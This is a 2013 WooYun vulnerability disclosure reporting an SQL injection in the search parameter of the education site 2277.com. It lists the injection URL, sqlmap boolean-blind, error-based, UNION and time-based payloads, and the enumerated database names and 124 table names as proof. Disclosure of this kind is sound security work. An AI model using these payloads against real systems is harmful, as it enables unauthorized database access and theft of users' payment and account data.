当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032324

漏洞标题:2277.com主站SQL注入漏洞

相关厂商:面对面互动教育网

漏洞作者: c2c2

提交时间:2013-07-25 23:33

修复时间:2013-09-08 23:34

公开时间:2013-09-08 23:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

www.2277.com 主站SQL注入漏洞,整站数据泄露

详细说明:

注入点:

http://www.2277.com/index.php?r=search/course&k=123


注入参数:k
---
Place: GET
Parameter: k
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=search/course&k=123' AND 8835=8835#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=search/course&k=123' AND (SELECT 5293 FROM(SELECT COUNT(*),CONCAT
(0x7168746571,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END)),0x716e797171,FL
OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QONP'
='QONP
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: r=search/course&k=-1912' UNION ALL SELECT CONCAT(0x7168746571,0x595
87a694d7a48595554,0x716e797171),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: r=search/course&k=123' AND SLEEP(5) AND 'wMJu'='wMJu
---

漏洞证明:

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
available databases [9]:
[*] 2277_bbs
[*] bbs_v2
[*] bill
[*] edu_db
[*] f2f
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


Database: f2f
[124 tables]
+------------------------------------+
| tb_check_list |
| tb_comments |
| tb_common_sequence |
| tb_course |
| tb_course_category |
| tb_course_category_course |
| tb_course_lesson_evaluate |
| tb_course_lesson_pay |
| tb_course_lesson_present |
| tb_course_lesson_screenshot |
| tb_course_period |
| tb_course_schedule |
| tb_courseware |
| tb_courseware_download |
| tb_courseware_reference |
| tb_deploy_classroom |
| tb_deploy_course_service |
| tb_deploy_course_status |
| tb_deploy_host |
| tb_deploy_host_ip |
| tb_deploy_online_log |
| tb_deploy_service |
| tb_deploy_service_type |
| tb_deploy_telecom |
| tb_group_buy |
| tb_group_buy_order |
| tb_order |
| tb_order_course |
| tb_order_course_evaluate |
| tb_pay_channel |
| tb_pay_currency |
| tb_pay_income_log |
| tb_pay_recharge |
| tb_pay_withdrawl |
| tb_permission_item |
| tb_permission_role |
| tb_permission_role_permission |
| tb_permission_user_role |
| tb_refund_order |
| tb_refund_process |
| tb_refund_reason |
| tb_school |
| tb_school_category |
| tb_school_category_course |
| tb_school_category_school |
| tb_school_contract |
| tb_school_course_category |
| tb_school_evaluate |
| tb_school_member |
| tb_school_member_permission |
| tb_school_permission_info |
| tb_school_permission_item |
| tb_school_permission_item_category |
| tb_setting_bank |
| tb_setting_city |
| tb_setting_country |
| tb_setting_province |
| tb_user_bank |
| tb_user_blacklist |
| tb_user_edu |
| tb_user_email_verify |
| tb_user_evaluate |
| tb_user_favorite |
| tb_user_favorite_category |
| tb_user_finger_email |
| tb_user_finger_mobilephone |
| tb_user_finger_username |
| tb_user_info |
| tb_user_loginlog |
| tb_user_register |
| tb_user_secure_question |
| tb_user_visit |
| tb_web_active_vote |
| tb_web_activity |
| tb_web_activity_application |
| tb_web_article |
| tb_web_article_activity |
| tb_web_article_type |
| tb_web_auth_module |
| tb_web_auth_module_operate |
| tb_web_auth_operate |
| tb_web_auth_role |
| tb_web_banner |
| tb_web_banner_datasource |
| tb_web_banner_log |
| tb_web_category |
| tb_web_category_info |
| tb_web_elite_type |
| tb_web_exinfo |
| tb_web_index_module |
| tb_web_index_module_type |
| tb_web_keyword |
| tb_web_log |
| tb_web_message |
| tb_web_message_receiver |
| tb_web_newbanner |
| tb_web_newbanner_type |
| tb_web_params |
| tb_web_real_identification |
| tb_web_student_taste |
| tb_web_tuan_course |
| tb_web_video_course |
| tb_web_video_course_active |
| tb_web_violation |
| v_analyse_evaluate_condition |
| v_deploy_classroom |
| v_deploy_classroom_all |
| v_deploy_service_host_ip |
| v_deploy_service_ip |
| v_evaluate_course |
| v_evaluate_learner |
| v_evaluate_period |
| v_evaluate_school |
| v_evaluate_teacher |
| v_good_evaluate_course |
| v_good_evaluate_learner |
| v_good_evaluate_period |
| v_good_evaluate_school |
| v_good_evaluate_teacher |
| v_learners_course |
| v_learners_course_period |
| v_learners_lesson |
| v_learners_lesson_time |
| v_query_pendpay_info |
+------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 c2c2@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝